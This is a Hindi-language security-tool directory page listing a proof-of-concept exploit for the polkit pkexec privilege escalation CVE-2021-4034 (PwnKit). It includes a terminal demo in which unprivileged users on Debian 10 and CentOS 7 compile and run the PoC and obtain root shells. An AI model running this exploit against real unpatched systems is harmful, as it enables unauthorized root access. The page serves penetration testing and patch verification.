Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/yakumwamba/poc-cve-2021-4034
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंग
GitHubyakumwamba/poc-cve-2021-4034

POC-CVE-2021-4034

CVE-2021-4034 (PwnKit) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो polkit के pkexec में एक स्थानीय विशेषाधिकार वृद्धि है, जिसे Debian 10 और CentOS 7 पर सत्यापित किया गया है।

रिपॉजिटरी देखें
424 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

polkit-bug

CVE-2021-4034

हालाँकि यह भेद्यता दूरस्थ रूप से शोषण योग्य नहीं है और अपने आप में मनमाना कोड निष्पादन की अनुमति नहीं देती है, फिर भी इसका उपयोग उन हमलावरों द्वारा किया जा सकता है जिन्होंने पहले से ही किसी भेद्य होस्ट पर पैर जमा लिया है, ताकि वे अपने विशेषाधिकारों को बढ़ा सकें और उस क्षमता को प्राप्त कर सकें।

https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

Debian 10 और CentOS 7 पर सत्यापित।

आप इस लिंक पर रिपॉजिटरी पा सकते हैं → https://github.com/Yakumwamba/POC-CVE-2021-4034.git

root@kitploit:~
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
root@kitploit:~
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit

अस्वीकरण - इस टूल का उपयोग दुर्भावनापूर्ण तरीके से किया जा सकता है

इसका उपयोग बिना पैच वाले Linux सर्वरों को नुकसान पहुँचाने या अक्षम करने के लिए भी किया जा सकता है। इस टूल के लेखक इसके उपयोग के परिणामस्वरूप होने वाली किसी भी क्षति या हानि के लिए जिम्मेदार नहीं हैं।

टूल डाउनलोड करें